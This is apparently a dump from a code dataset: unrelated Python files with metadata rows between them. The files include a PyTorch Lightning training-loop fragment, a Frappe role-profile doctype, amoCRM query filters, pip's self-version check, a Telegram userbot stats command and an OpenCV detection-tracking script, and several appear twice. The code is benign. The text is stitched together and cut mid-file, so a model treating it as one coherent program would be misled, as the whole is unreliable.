    # validation is only allowed at all on an eligible epoch
    epoch_is_eligible = (trainer.current_epoch + 1) % trainer.check_val_every_n_epoch == 0
    if not (trainer.enable_validation and epoch_is_eligible):
        return False
    # trigger on the configured batch interval, on a stop request, or on the
    # last batch of an infinite (unsized) dataset
    at_check_interval = (batch_idx + 1) % trainer.val_check_batch == 0
    infinite_dataset_end = is_last_batch and trainer.val_check_batch == float("inf")
    return bool(at_check_interval or trainer.should_stop or infinite_dataset_end)
def build_train_args(self, batch, batch_idx, opt_idx, hiddens):
    """Assemble the positional argument list for the user's ``training_step``.

    ``optimizer_idx`` is only passed with multiple optimizers, and ``hiddens``
    only when truncated BPTT is active.
    """
    args = [batch, batch_idx]
    num_opts = len(self.trainer.optimizers)
    if num_opts > 1:
        # with several optimizers the user MUST accept optimizer_idx
        if not self.trainer.has_arg("training_step", "optimizer_idx"):
            raise ValueError(
                f"Your LightningModule defines {num_opts} optimizers but "
                f'training_step is missing the "optimizer_idx" argument.'
            )
        args.append(opt_idx)
    # pass hiddens if using tbptt
    if self.trainer.truncated_bptt_steps is not None:
        args.append(hiddens)
    return args
def save_loggers_on_train_batch_end(self):
    """Flush the logger to disk when the flush interval (or fast_dev_run)
    says so; only rank zero writes, and only when a logger is attached."""
    trainer = self.trainer
    if not (trainer.logger_connector.should_flush_logs or trainer.fast_dev_run):
        return
    if trainer.is_global_zero and trainer.logger is not None:
        trainer.logger.save()
def process_train_step_outputs(self, all_train_step_outputs, early_stopping_accumulator, checkpoint_accumulator):
    """Filter raw per-optimizer step outputs down to what epoch end needs.

    Also feeds legacy ``early_stop_on``/``checkpoint_on`` values into their
    accumulators. Outputs are kept only when they must be auto-reduced at
    epoch end or when the user overrides ``training_epoch_end``.
    """
    # the training step outputs a list per optimizer. The list contains the outputs at each time step
    # when no TBPTT is used, then the list has 1 item per batch
    # when TBPTT IS used, then the list has n items (1 per time step)
    epoch_end_outputs = []
    for optimizer_idx_outputs in all_train_step_outputs:
        # extract one representative sample from each time step (1 if no tbptt) and 0th optimizer
        if len(optimizer_idx_outputs) == 0:
            continue
        sample_output = optimizer_idx_outputs[-1]
        # pull out callback info if available (ie: Results object)
        if isinstance(sample_output, dict) and "early_stop_on" in sample_output:
            early_stopping_accumulator.accumulate(sample_output["early_stop_on"])
        if isinstance(sample_output, dict) and "checkpoint_on" in sample_output:
            checkpoint_accumulator.accumulate(sample_output["checkpoint_on"])
        # decide if we need to reduce at the end of the epoch automatically
        auto_reduce_tng_result = isinstance(sample_output, Result) and sample_output.should_reduce_on_epoch_end
        # only track when a) it needs to be autoreduced OR b) the user wants to manually reduce on epoch end
        if is_overridden("training_epoch_end", model=self.trainer.get_model()) or auto_reduce_tng_result:
            epoch_end_outputs.append(optimizer_idx_outputs)
    return epoch_end_outputs
def prepare_optimizers(self):
    """Return the (index, optimizer) pairs to iterate for this batch.

    Manual optimization handles all optimizers inside a single closure, so it
    only receives the first entry; automatic optimization iterates them all.
    """
    optimizers = self.get_optimizers_iterable()
    return optimizers if self.automatic_optimization else [optimizers[0]]
def run_train_split_start(self, split_idx, split_batch, opt_idx, optimizer):
    """Prepare trainer state and the model for one TBPTT split/optimizer pair."""
    # expose the active split to the trainer for tracking
    self.trainer.split_idx = split_idx
    # with multiple optimizers, restrict gradient computation to the active
    # optimizer's parameters
    if self.automatic_optimization and len(self.trainer.optimizers) > 1:
        self.trainer.get_model().toggle_optimizer(optimizer, opt_idx)
    self.trainer.logger_connector.on_train_split_start(split_idx, opt_idx, split_batch)
def update_running_loss(self):
    """Fold the accumulated loss into the running loss and reset the
    accumulator.

    The accumulator holds the per-micro-batch losses of the current
    accumulation window; their mean times ``accumulate_grad_batches``
    recovers the effective loss of the optimizer step.
    """
    accumulated_loss = self.accumulated_loss.mean()
    if accumulated_loss is not None:
        # reuse the already-computed mean instead of recomputing it
        self.running_loss.append(accumulated_loss * self.trainer.accumulate_grad_batches)
    # reset for the next accumulation window
    self.accumulated_loss.reset()
def zero_grad_handler(self, batch_idx, optimizer, opt_idx):
    """Run the pre-zero-grad hook (automatic mode only) and zero gradients.

    Automatic optimization zeroes only the currently active optimizer; manual
    optimization zeroes every configured optimizer.
    """
    if self.automatic_optimization:
        self.on_before_zero_grad(optimizer)
        targets = enumerate([optimizer])
    else:
        targets = self.get_optimizers_iterable()
    # NOTE(review): the same opt_idx is forwarded for every optimizer in the
    # manual branch — presumably intentional; confirm upstream.
    for _, opt in targets:
        self.optimizer_zero_grad(batch_idx, opt, opt_idx)
| true
| true
|
f705d8375b61940c4c02bcdbae22797b6b711bb0
| 664
|
py
|
Python
|
frappe/core/doctype/role_profile/role_profile.py
|
erpnext-tm/frappe
|
7b470f28e1cf00b0659c01e06a2d0a4693b28d98
|
[
"MIT"
] | null | null | null |
frappe/core/doctype/role_profile/role_profile.py
|
erpnext-tm/frappe
|
7b470f28e1cf00b0659c01e06a2d0a4693b28d98
|
[
"MIT"
] | null | null | null |
frappe/core/doctype/role_profile/role_profile.py
|
erpnext-tm/frappe
|
7b470f28e1cf00b0659c01e06a2d0a4693b28d98
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright (c) 2017, Frappe Technologies and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
from frappe.model.document import Document
class RoleProfile(Document):
    def autoname(self):
        """Name the document after its role profile."""
        self.name = self.role_profile

    def on_update(self):
        """Propagate this profile's roles to every user linked to it."""
        role_names = [entry.role for entry in self.roles]
        linked_users = frappe.get_all("User", filters={"role_profile_name": self.name})
        for user_info in linked_users:
            user_doc = frappe.get_doc("User", user_info)
            # replace the user's roles wholesale with the profile's roles
            user_doc.set("roles", [])
            user_doc.add_roles(*role_names)
| 27.666667
| 74
| 0.721386
|
from __future__ import unicode_literals
import frappe
from frappe.model.document import Document
class RoleProfile(Document):
def autoname(self):
self.name = self.role_profile
def on_update(self):
users = frappe.get_all("User", filters={"role_profile_name": self.name})
roles = [role.role for role in self.roles]
for d in users:
user = frappe.get_doc("User", d)
user.set("roles", [])
user.add_roles(*roles)
| true
| true
|
f705d8e2048ebd543efcfc2b8d5258b47b62b213
| 162
|
py
|
Python
|
output/models/ms_data/complex_type/ct_f013_xsd/__init__.py
|
tefra/xsdata-w3c-tests
|
b6b6a4ac4e0ab610e4b50d868510a8b7105b1a5f
|
[
"MIT"
] | 1
|
2021-08-14T17:59:21.000Z
|
2021-08-14T17:59:21.000Z
|
output/models/ms_data/complex_type/ct_f013_xsd/__init__.py
|
tefra/xsdata-w3c-tests
|
b6b6a4ac4e0ab610e4b50d868510a8b7105b1a5f
|
[
"MIT"
] | 4
|
2020-02-12T21:30:44.000Z
|
2020-04-15T20:06:46.000Z
|
output/models/ms_data/complex_type/ct_f013_xsd/__init__.py
|
tefra/xsdata-w3c-tests
|
b6b6a4ac4e0ab610e4b50d868510a8b7105b1a5f
|
[
"MIT"
] | null | null | null |
from output.models.ms_data.complex_type.ct_f013_xsd.ct_f013 import (
FooType,
MyType,
Root,
)
# Public re-exports of the generated ct_f013 schema classes.
__all__ = [
    "FooType",
    "MyType",
    "Root",
]
| 13.5
| 68
| 0.617284
|
from output.models.ms_data.complex_type.ct_f013_xsd.ct_f013 import (
FooType,
MyType,
Root,
)
__all__ = [
"FooType",
"MyType",
"Root",
]
| true
| true
|
f705db97cc2202b63ed43321fb14e2dd46519851
| 1,758
|
py
|
Python
|
amocrm/v2/filters.py
|
rolldeep/amocrm_api
|
61111a9736e2893bc4c625bebe5e8a71645e9b25
|
[
"MIT"
] | null | null | null |
amocrm/v2/filters.py
|
rolldeep/amocrm_api
|
61111a9736e2893bc4c625bebe5e8a71645e9b25
|
[
"MIT"
] | null | null | null |
amocrm/v2/filters.py
|
rolldeep/amocrm_api
|
61111a9736e2893bc4c625bebe5e8a71645e9b25
|
[
"MIT"
] | null | null | null |
import datetime


class Filter:
    """Base class for amoCRM query filters; subclasses emit request params."""

    def __init__(self, name):
        self._name = name

    def _as_params(self):
        """Return the query-string parameters this filter contributes."""
        return {}


class SingleFilter(Filter):
    """Filter on one scalar value: ``filter[<name>]=<value>``."""

    def __call__(self, value):
        self._value = value
        return self

    def _as_params(self):
        return {f"filter[{self._name}]": self._value}


class SingleListFilter(Filter):
    """Filter using list syntax with one value: ``filter[<name>][]=<value>``."""

    def __call__(self, value):
        self._value = value
        return self

    def _as_params(self):
        return {f"filter[{self._name}][]": self._value}


class MultiFilter(Filter):
    """Filter passing several values under index 0: ``filter[<name>][0]``."""

    def __call__(self, values):
        self._values = values
        return self

    def _as_params(self):
        return {f"filter[{self._name}][0]": self._values}


class RangeFilter(Filter):
    """Filter on an inclusive from/to range."""

    def __call__(self, value_from, value_to):
        self._value_from = value_from
        self._value_to = value_to
        return self

    def _as_params(self):
        return {
            f"filter[{self._name}][from]": self._value_from,
            f"filter[{self._name}][to]": self._value_to,
        }


class DateRangeFilter(RangeFilter):
    """Range filter over datetimes, sent as integer unix timestamps."""

    def __call__(self, value_from: datetime.datetime, value_to: datetime.datetime):
        self._value_from = int(value_from.timestamp())
        self._value_to = int(value_to.timestamp())
        return self


class EventsFiltersByPipelineAndStatus(Filter):
    """Events filter matching a prior lead status within a given pipeline."""

    def __call__(self, pipline_id, status_id):
        # NOTE: parameter name "pipline_id" (sic) kept for caller compatibility
        self._pipline_id = pipline_id
        self._status_id = status_id
        return self

    def _as_params(self):
        return {
            "filter[value_before][leads_statuses][0][pipeline_id]": self._pipline_id,
            "filter[value_before][leads_statuses][0][status_id]": self._status_id,
        }
| 25.478261
| 85
| 0.633106
|
import datetime
class Filter:
def __init__(self, name):
self._name = name
def _as_params(self):
return {}
class SingleFilter(Filter):
def __call__(self, value):
self._value = value
return self
def _as_params(self):
return {"filter[{}]".format(self._name): self._value}
class SingleListFilter(Filter):
def __call__(self, value):
self._value = value
return self
def _as_params(self):
return {"filter[{}][]".format(self._name): self._value}
class MultiFilter(Filter):
def __call__(self, values):
self._values = values
return self
def _as_params(self):
return {"filter[{}][0]".format(self._name): self._values}
class RangeFilter(Filter):
def __call__(self, value_from, value_to):
self._value_from = value_from
self._value_to = value_to
return self
def _as_params(self):
return {
"filter[{}][from]".format(self._name): self._value_from,
"filter[{}][to]".format(self._name): self._value_to,
}
class DateRangeFilter(RangeFilter):
def __call__(self, value_from: datetime.datetime, value_to: datetime.datetime):
self._value_from = int(value_from.timestamp())
self._value_to = int(value_to.timestamp())
return self
class EventsFiltersByPipelineAndStatus(Filter):
def __call__(self, pipline_id, status_id):
self._pipline_id = pipline_id
self._status_id = status_id
return self
def _as_params(self):
return {
"filter[value_before][leads_statuses][0][pipeline_id]": self._pipline_id,
"filter[value_before][leads_statuses][0][status_id]": self._status_id
}
| true
| true
|
f705dbc83088bdd8282fa9e38c778f2f552bec1f
| 6,550
|
py
|
Python
|
src/pip/_internal/self_outdated_check.py
|
jameshfisher/pip
|
8365bc3dcc21809f2fb86c4db5e40aaf2384c897
|
[
"MIT"
] | null | null | null |
src/pip/_internal/self_outdated_check.py
|
jameshfisher/pip
|
8365bc3dcc21809f2fb86c4db5e40aaf2384c897
|
[
"MIT"
] | null | null | null |
src/pip/_internal/self_outdated_check.py
|
jameshfisher/pip
|
8365bc3dcc21809f2fb86c4db5e40aaf2384c897
|
[
"MIT"
] | null | null | null |
import datetime
import hashlib
import json
import logging
import os.path
import sys
from typing import TYPE_CHECKING
from pip._vendor.packaging.version import parse as parse_version
from pip._internal.index.collector import LinkCollector
from pip._internal.index.package_finder import PackageFinder
from pip._internal.metadata import get_default_environment
from pip._internal.models.selection_prefs import SelectionPreferences
from pip._internal.utils.filesystem import adjacent_tmp_file, check_path_owner, replace
from pip._internal.utils.misc import ensure_dir
if TYPE_CHECKING:
import optparse
from typing import Any, Dict
from pip._internal.network.session import PipSession
SELFCHECK_DATE_FMT = "%Y-%m-%dT%H:%M:%SZ"
logger = logging.getLogger(__name__)
def _get_statefile_name(key):
    # type: (str) -> str
    """Return a filesystem-safe cache file name for *key*: its SHA-224 hex digest."""
    key_bytes = key.encode()
    name = hashlib.sha224(key_bytes).hexdigest()
    return name
class SelfCheckState:
    """Persisted record of the last pip self-version check for this prefix."""

    def __init__(self, cache_dir):
        # type: (str) -> None
        self.state = {}  # type: Dict[str, Any]
        self.statefile_path = None

        # Without a cache directory there is nothing to load or persist.
        if cache_dir:
            self.statefile_path = os.path.join(
                cache_dir, "selfcheck", _get_statefile_name(self.key)
            )
            try:
                with open(self.statefile_path, encoding="utf-8") as statefile:
                    self.state = json.load(statefile)
            except (OSError, ValueError, KeyError):
                # A missing or corrupt cache file is not an error; start fresh.
                pass

    @property
    def key(self):
        # type: () -> str
        """The environment prefix this state belongs to."""
        return sys.prefix

    def save(self, pypi_version, current_time):
        # type: (str, datetime.datetime) -> None
        """Persist the latest-known PyPI version and the check timestamp."""
        # Nothing to do when no cache location was configured.
        if not self.statefile_path:
            return

        state_dir = os.path.dirname(self.statefile_path)
        # Refuse to write into a directory owned by another user.
        if not check_path_owner(state_dir):
            return

        ensure_dir(state_dir)

        payload = json.dumps(
            {
                # Include the key so it's easy to tell which pip wrote the file.
                "key": self.key,
                "last_check": current_time.strftime(SELFCHECK_DATE_FMT),
                "pypi_version": pypi_version,
            },
            sort_keys=True,
            separators=(",", ":"),
        )

        with adjacent_tmp_file(self.statefile_path) as f:
            f.write(payload.encode())

        try:
            # The state file is prefix-specific, so overwriting is safe.
            replace(f.name, self.statefile_path)
        except OSError:
            # Best effort.
            pass
def was_installed_by_pip(pkg):
    # type: (str) -> bool
    """Checks whether pkg was installed by pip

    This is used not to display the upgrade message when pip is in fact
    installed by system package manager, such as dnf on Fedora.
    """
    dist = get_default_environment().get_distribution(pkg)
    if dist is None:
        return False
    return dist.installer == "pip"
def pip_self_version_check(session, options):
    # type: (PipSession, optparse.Values) -> None
    """Check for an update for pip.

    Limit the frequency of checks to once per week. State is stored either in
    the active virtualenv or in the user's USER_CACHE_DIR keyed off the prefix
    of the pip script path.
    """
    installed_dist = get_default_environment().get_distribution("pip")
    if not installed_dist:
        return
    pip_version = installed_dist.version
    pypi_version = None
    try:
        state = SelfCheckState(cache_dir=options.cache_dir)
        current_time = datetime.datetime.utcnow()
        # Determine if we need to refresh the state
        if "last_check" in state.state and "pypi_version" in state.state:
            last_check = datetime.datetime.strptime(
                state.state["last_check"],
                SELFCHECK_DATE_FMT
            )
            # Reuse the cached answer when the last check was under a week ago.
            if (current_time - last_check).total_seconds() < 7 * 24 * 60 * 60:
                pypi_version = state.state["pypi_version"]
        # Refresh the version if we need to or just see if we need to warn
        if pypi_version is None:
            # Lets use PackageFinder to see what the latest pip version is
            link_collector = LinkCollector.create(
                session,
                options=options,
                suppress_no_index=True,
            )
            # Pass allow_yanked=False so we don't suggest upgrading to a
            # yanked version.
            selection_prefs = SelectionPreferences(
                allow_yanked=False,
                allow_all_prereleases=False,  # Explicitly set to False
            )
            finder = PackageFinder.create(
                link_collector=link_collector,
                selection_prefs=selection_prefs,
            )
            best_candidate = finder.find_best_candidate("pip").best_candidate
            if best_candidate is None:
                return
            pypi_version = str(best_candidate.version)
            # save that we've performed a check
            state.save(pypi_version, current_time)
        remote_version = parse_version(pypi_version)
        # Warn only on a new base version, and only when pip manages itself.
        local_version_is_older = (
            pip_version < remote_version and
            pip_version.base_version != remote_version.base_version and
            was_installed_by_pip('pip')
        )
        # Determine if our pypi_version is older
        if not local_version_is_older:
            return
        # We cannot tell how the current pip is available in the current
        # command context, so be pragmatic here and suggest the command
        # that's always available. This does not accommodate spaces in
        # `sys.executable`.
        pip_cmd = f"{sys.executable} -m pip"
        logger.warning(
            "You are using pip version %s; however, version %s is "
            "available.\nYou should consider upgrading via the "
            "'%s install --upgrade pip' command.",
            pip_version, pypi_version, pip_cmd
        )
    except Exception:
        # The self-check is best-effort: never let it break the actual command.
        logger.debug(
            "There was an error checking the latest version of pip",
            exc_info=True,
        )
| 33.937824
| 87
| 0.630382
|
import datetime
import hashlib
import json
import logging
import os.path
import sys
from typing import TYPE_CHECKING
from pip._vendor.packaging.version import parse as parse_version
from pip._internal.index.collector import LinkCollector
from pip._internal.index.package_finder import PackageFinder
from pip._internal.metadata import get_default_environment
from pip._internal.models.selection_prefs import SelectionPreferences
from pip._internal.utils.filesystem import adjacent_tmp_file, check_path_owner, replace
from pip._internal.utils.misc import ensure_dir
if TYPE_CHECKING:
import optparse
from typing import Any, Dict
from pip._internal.network.session import PipSession
SELFCHECK_DATE_FMT = "%Y-%m-%dT%H:%M:%SZ"
logger = logging.getLogger(__name__)
def _get_statefile_name(key):
key_bytes = key.encode()
name = hashlib.sha224(key_bytes).hexdigest()
return name
class SelfCheckState:
def __init__(self, cache_dir):
self.state = {}
self.statefile_path = None
if cache_dir:
self.statefile_path = os.path.join(
cache_dir, "selfcheck", _get_statefile_name(self.key)
)
try:
with open(self.statefile_path, encoding="utf-8") as statefile:
self.state = json.load(statefile)
except (OSError, ValueError, KeyError):
# error out if the cache file is invalid.
pass
@property
def key(self):
# type: () -> str
return sys.prefix
def save(self, pypi_version, current_time):
# type: (str, datetime.datetime) -> None
# If we do not have a path to cache in, don't bother saving.
if not self.statefile_path:
return
if not check_path_owner(os.path.dirname(self.statefile_path)):
return
ensure_dir(os.path.dirname(self.statefile_path))
state = {
# file.
"key": self.key,
"last_check": current_time.strftime(SELFCHECK_DATE_FMT),
"pypi_version": pypi_version,
}
text = json.dumps(state, sort_keys=True, separators=(",", ":"))
with adjacent_tmp_file(self.statefile_path) as f:
f.write(text.encode())
try:
# Since we have a prefix-specific state file, we can just
# overwrite whatever is there, no need to check.
replace(f.name, self.statefile_path)
except OSError:
# Best effort.
pass
def was_installed_by_pip(pkg):
# type: (str) -> bool
dist = get_default_environment().get_distribution(pkg)
return dist is not None and "pip" == dist.installer
def pip_self_version_check(session, options):
    # type: (PipSession, optparse.Values) -> None
    """Warn the user if a newer pip version is available on PyPI.

    The latest-version lookup is cached for a week via SelfCheckState.
    Any failure is logged at debug level and otherwise ignored: this check
    must never break the pip command the user actually ran.
    """
    installed_dist = get_default_environment().get_distribution("pip")
    if not installed_dist:
        return
    pip_version = installed_dist.version
    pypi_version = None
    try:
        state = SelfCheckState(cache_dir=options.cache_dir)
        current_time = datetime.datetime.utcnow()
        # Determine if we need to refresh the state: reuse the cached PyPI
        # version if the last check is less than a week old.
        if "last_check" in state.state and "pypi_version" in state.state:
            last_check = datetime.datetime.strptime(
                state.state["last_check"],
                SELFCHECK_DATE_FMT
            )
            if (current_time - last_check).total_seconds() < 7 * 24 * 60 * 60:
                pypi_version = state.state["pypi_version"]
        # Refresh the version if we need to or just see if we need to warn
        if pypi_version is None:
            # Let's use PackageFinder to see what the latest pip version is.
            link_collector = LinkCollector.create(
                session,
                options=options,
                suppress_no_index=True,
            )
            # Pass allow_yanked=False so we don't suggest upgrading to a
            # yanked release.
            selection_prefs = SelectionPreferences(
                allow_yanked=False,
                allow_all_prereleases=False,
            )
            finder = PackageFinder.create(
                link_collector=link_collector,
                selection_prefs=selection_prefs,
            )
            best_candidate = finder.find_best_candidate("pip").best_candidate
            if best_candidate is None:
                return
            pypi_version = str(best_candidate.version)
            state.save(pypi_version, current_time)
        remote_version = parse_version(pypi_version)
        # Only warn when the remote version is strictly newer (ignoring
        # pre/post suffixes of the same base version) AND pip manages itself;
        # otherwise "pip install --upgrade pip" would not apply.
        local_version_is_older = (
            pip_version < remote_version and
            pip_version.base_version != remote_version.base_version and
            was_installed_by_pip('pip')
        )
        # Determine if our pypi_version is older
        if not local_version_is_older:
            return
        # We cannot tell how the current pip is available in the current
        # command context, so be pragmatic here and suggest the command
        # that's always available. This does not accommodate spaces in
        # sys.executable.
        pip_cmd = f"{sys.executable} -m pip"
        logger.warning(
            "You are using pip version %s; however, version %s is "
            "available.\nYou should consider upgrading via the "
            "'%s install --upgrade pip' command.",
            pip_version, pypi_version, pip_cmd
        )
    except Exception:
        logger.debug(
            "There was an error checking the latest version of pip",
            exc_info=True,
        )
| true
| true
|
f705dc263f4b173513dc6e8e38729cebb3b5b1ae
| 259
|
py
|
Python
|
Python/treehopper/libraries/displays/led_shift_register.py
|
ehailey1/treehopper-sdk
|
c242f939a93d93da11ff79577666130c15aecec7
|
[
"MIT"
] | 3
|
2018-03-16T07:00:42.000Z
|
2022-03-27T00:39:55.000Z
|
Python/treehopper/libraries/displays/led_shift_register.py
|
ehailey1/treehopper-sdk
|
c242f939a93d93da11ff79577666130c15aecec7
|
[
"MIT"
] | 16
|
2016-08-12T18:51:04.000Z
|
2021-04-16T16:14:07.000Z
|
Python/treehopper/libraries/displays/led_shift_register.py
|
ehailey1/treehopper-sdk
|
c242f939a93d93da11ff79577666130c15aecec7
|
[
"MIT"
] | 6
|
2015-11-04T15:53:49.000Z
|
2020-06-25T18:34:47.000Z
|
from treehopper.libraries.displays import LedDriver
from treehopper.libraries.io.expander.shift_register import ChainableShiftRegisterOutput
class LedShiftRegister(ChainableShiftRegisterOutput, LedDriver):
    """LED driver backed by a daisy-chainable shift register.

    All behavior comes from the two base classes; this class only combines
    the chainable shift-register output with the LedDriver interface.
    """
    def __init__(self):
        # Cooperative init across both base classes.
        super().__init__()
| 32.375
| 88
| 0.822394
|
from treehopper.libraries.displays import LedDriver
from treehopper.libraries.io.expander.shift_register import ChainableShiftRegisterOutput
class LedShiftRegister(ChainableShiftRegisterOutput, LedDriver):
def __init__(self):
super().__init__()
| true
| true
|
f705dc6351fae60f5584a9468074494232907552
| 1,250
|
py
|
Python
|
userbot/plugins/stats.py
|
NIKHIL5757H/SimbhaUserbot
|
86bd946a47bd0d74f5ef3c46ef00f9bdb9bf11e0
|
[
"MIT"
] | 2
|
2020-07-25T17:58:55.000Z
|
2020-11-26T10:54:46.000Z
|
userbot/plugins/stats.py
|
NIKHIL5757H/SimbhaUserbot
|
86bd946a47bd0d74f5ef3c46ef00f9bdb9bf11e0
|
[
"MIT"
] | null | null | null |
userbot/plugins/stats.py
|
NIKHIL5757H/SimbhaUserbot
|
86bd946a47bd0d74f5ef3c46ef00f9bdb9bf11e0
|
[
"MIT"
] | 2
|
2020-08-03T09:09:06.000Z
|
2020-08-12T05:05:24.000Z
|
from userbot import bot
from telethon import events
import asyncio
from datetime import datetime
from telethon.tl.types import User, Chat, Channel
from uniborg.util import admin_cmd
@bot.on(admin_cmd(pattern=r"stats"))
async def _(event):
    """Count this account's dialogs by kind and edit the message with a summary."""
    if event.fwd_from:
        return
    started = datetime.now()
    # Counters: private chats, legacy groups, supergroups, broadcast channels, bots.
    counts = {"users": 0, "groups": 0, "supergroups": 0, "channels": 0, "bots": 0}
    dialogs = await bot.get_dialogs(limit=None, ignore_migrated=True)
    for dialog in dialogs:
        entity = dialog.entity
        if type(entity) is User:
            if entity.bot:
                counts["bots"] += 1
            else:
                counts["users"] += 1
        elif type(entity) is Chat:
            counts["groups"] += 1
        elif type(entity) is Channel:
            # Telethon models both supergroups and broadcast channels as
            # Channel; the `broadcast` flag tells them apart.
            if entity.broadcast:
                counts["channels"] += 1
            else:
                counts["supergroups"] += 1
        else:
            print(dialog)
    elapsed = (datetime.now() - started).seconds
    await event.edit("""
=================================
`Your Stats Obtained in {} seconds`
`You have {} Private Messages`
`You are in {} Groups`
`You are in {} Super Groups`
`You Are in {} Channels`
`And finally Bots = {}`
===================================""".format(elapsed, counts["users"],
                                              counts["groups"],
                                              counts["supergroups"],
                                              counts["channels"],
                                              counts["bots"]))
| 25.510204
| 66
| 0.5312
|
from userbot import bot
from telethon import events
import asyncio
from datetime import datetime
from telethon.tl.types import User, Chat, Channel
from uniborg.util import admin_cmd
@bot.on(admin_cmd(pattern=r"stats"))
async def _(event):
if event.fwd_from:
return
start = datetime.now()
u = 0
g = 0
c = 0
bc = 0
b = 0
dialogs = await bot.get_dialogs(
limit=None,
ignore_migrated=True
)
for d in dialogs:
currrent_entity = d.entity
if type(currrent_entity) is User:
if currrent_entity.bot:
b += 1
else:
u += 1
elif type(currrent_entity) is Chat:
g += 1
elif type(currrent_entity) is Channel:
if currrent_entity.broadcast:
bc += 1
else:
c += 1
else:
print(d)
end = datetime.now()
ms = (end - start).seconds
await event.edit("""
=================================
`Your Stats Obtained in {} seconds`
`You have {} Private Messages`
`You are in {} Groups`
`You are in {} Super Groups`
`You Are in {} Channels`
`And finally Bots = {}`
===================================""".format(ms, u, g, c, bc, b))
| true
| true
|
f705dd4832b18fd425450cd30cdfb3cf0a126a5e
| 5,623
|
py
|
Python
|
tracking.py
|
hnkulkarni/cs231aApproachingOdt
|
07c68d787442243d653ae72a7e9473b4c3c5c6b4
|
[
"MIT"
] | null | null | null |
tracking.py
|
hnkulkarni/cs231aApproachingOdt
|
07c68d787442243d653ae72a7e9473b4c3c5c6b4
|
[
"MIT"
] | null | null | null |
tracking.py
|
hnkulkarni/cs231aApproachingOdt
|
07c68d787442243d653ae72a7e9473b4c3c5c6b4
|
[
"MIT"
] | null | null | null |
# This file will track detections
import tqdm
import cv2
import matplotlib.pyplot as plt
import matplotlib.patches as patches
from matplotlib.ticker import NullLocator
from cs231aApproachingOdt import utils as myutils
from PIL import Image
import os
import torch
import torchvision.ops.boxes as bops
def match_detections(prev_path, prev_detection, new_path, new_detection, size=(640, 480)):
    """Match detections between two frames.

    For every (old, new) detection index pair, draw both boxes side by side,
    then accept the pair when the boxes overlap (IoU >= 0.7) and the cropped
    patches pass normalized cross-correlation template matching.

    Returns a list of (old_index, new_index) tuples for accepted pairs.
    """
    prev_range = [*range(len(prev_detection))]
    new_range = [*range(len(new_detection))]
    permutations = myutils.unique_permutations(prev_range, new_range)
    fig, ax = plt.subplots(1, 2)
    prev_img = myutils.load_resize(prev_path, size)
    new_img = myutils.load_resize(new_path, size)
    # Hoisted out of the loop: this list is loop-invariant.  Index 3
    # (TM_CCORR_NORMED) is the mode actually used below.
    methods = ['cv2.TM_CCOEFF', 'cv2.TM_CCOEFF_NORMED', 'cv2.TM_CCORR',
               'cv2.TM_CCORR_NORMED', 'cv2.TM_SQDIFF', 'cv2.TM_SQDIFF_NORMED']
    matching_pairs = []
    for old, new in permutations:
        # Clear both axes before redrawing this pair (plain loop instead of
        # a side-effect list comprehension).
        for a in ax:
            a.cla()
        draw_detection(prev_img, prev_detection[old], ax[0])
        ax[0].set_title(f"{os.path.basename(prev_path)}")
        draw_detection(new_img, new_detection[new], ax[1])
        ax[1].set_title(f"{os.path.basename(new_path)}")
        # Cheap geometric gate first: skip template matching unless the two
        # boxes overlap substantially.
        iou = get_iou(prev_detection[old], new_detection[new])
        if iou < 0.7:
            continue
        prev_crop = crop_detection(prev_img, prev_detection[old])
        new_crop = crop_detection(new_img, new_detection[new])
        # Fix: idiomatic truthiness test instead of `== True`.
        if template_matching(new_crop, prev_crop, methods[3]):
            matching_pairs.append((old, new))
    plt.close(fig)
    return matching_pairs
def get_iou(prev_detection, new_detection):
    """Intersection-over-union of two detections' [x1, y1, x2, y2] boxes.

    Pure-torch equivalent of ``torchvision.ops.boxes.box_iou`` — the file
    already depends on torch, so the torchvision import is not needed here.
    Returns a (1, 1) tensor, matching the previous box_iou call.
    """
    box1 = new_detection[:4].reshape((1, 4))
    box2 = prev_detection[:4].reshape((1, 4))
    area1 = (box1[:, 2] - box1[:, 0]) * (box1[:, 3] - box1[:, 1])
    area2 = (box2[:, 2] - box2[:, 0]) * (box2[:, 3] - box2[:, 1])
    lt = torch.max(box1[:, None, :2], box2[None, :, :2])  # intersection top-left
    rb = torch.min(box1[:, None, 2:], box2[None, :, 2:])  # intersection bottom-right
    wh = (rb - lt).clamp(min=0)  # zero width/height when boxes don't overlap
    inter = wh[..., 0] * wh[..., 1]
    iou = inter / (area1[:, None] + area2[None, :] - inter)
    return iou
def template_matching(img1, template, method):
    """Return True when *template* is found in *img1* via cv2.matchTemplate.

    *method* is a cv2 constant name such as ``'cv2.TM_CCORR_NORMED'`` (a raw
    int constant is also accepted).  Returns False when the template is
    larger than the image in either dimension.

    NOTE(review): the 0.9 threshold is applied to max_val, which is only
    meaningful for correlation-style methods (the caller uses
    TM_CCORR_NORMED); for TM_SQDIFF* a *low* min_val indicates a match.
    """
    template_gray = cv2.cvtColor(template, cv2.COLOR_BGR2GRAY)
    img1_gray = cv2.cvtColor(img1, cv2.COLOR_BGR2GRAY)
    # shape is (rows, cols); reversed gives (width, height).
    w_t, h_t = template_gray.shape[::-1]
    w_i, h_i = img1_gray.shape[::-1]
    if (w_t > w_i) or (h_t > h_i):
        # Template cannot fit inside the image.
        return False
    # Fix: resolve the cv2 constant by attribute lookup instead of eval() on
    # a string; also removed the unused figure that was created and leaked
    # here on every call, plus the dead img/top_left locals.
    if isinstance(method, str):
        method = getattr(cv2, method.split('.')[-1])
    res = cv2.matchTemplate(img1_gray, template_gray, method)
    _, max_val, _, _ = cv2.minMaxLoc(res)
    return max_val > 0.9
def keypoint_matching(img1, img2):
    """Show the 10 best ORB keypoint matches between two BGR images.

    Source: https://docs.opencv.org/master/dc/dc3/tutorial_py_matcher.html
    """
    img1_gray = cv2.cvtColor(img1, cv2.COLOR_BGR2GRAY)
    img2_gray = cv2.cvtColor(img2, cv2.COLOR_BGR2GRAY)
    myutils.show(img1_gray)
    orb = cv2.ORB_create()
    # Keypoints and descriptors for both images.
    kp1, des1 = orb.detectAndCompute(img1_gray, None)
    kp2, des2 = orb.detectAndCompute(img2_gray, None)
    # Brute-force matcher with Hamming distance (ORB descriptors are binary).
    bf = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=True)
    # Best matches first (smallest descriptor distance).
    matches = sorted(bf.match(des1, des2), key=lambda m: m.distance)
    img3 = cv2.drawMatches(img1, kp1, img2, kp2, matches[:10], None,
                           flags=cv2.DrawMatchesFlags_NOT_DRAW_SINGLE_POINTS)
